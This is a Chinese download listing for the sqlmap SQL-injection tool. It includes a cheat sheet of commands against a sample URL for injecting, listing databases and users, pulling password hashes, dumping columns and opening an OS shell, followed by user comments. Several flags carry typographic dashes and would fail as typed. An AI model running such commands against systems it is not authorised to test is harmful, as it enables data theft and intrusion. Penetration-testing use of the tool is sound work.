【文件属性】:
文件名称:sqlmap.py 脚本 sqlmap-master.zip
文件大小:6.51MB
文件格式:ZIP
更新时间:2017-11-05 10:41:15
sqlmap.py 脚本 sqlmap
是sqlmap的脚本,解压后可直接运行
列几个基本命令
./sqlmap.py –h //查看帮助信息
./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” //get注入
./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --data “DATA”//post注入
./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --cookie “COOKIE”//修改请求时的cookie
./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --dbs //列数据库
./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-users //列用户
./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-passwords //获取密码hash
./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-tables -D DB_NAME //列DB_NAME的表
./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-columns –T TB_NAME -D DB_NAME //读取TB_NAME中的列
./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-dump –C C1,C2,C3 –T TB_NAME -D DB_NAME //读字段C1,C2,C3数据
./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-os-shell //取得一个shell
网友评论
- 亲测可用~自己在windows上搭建了个python平台来做测试,不错,谢谢分享~
- 很好用,谢谢群主
- 不错的工具,不过一点也学不到什么东西,只是个工具而已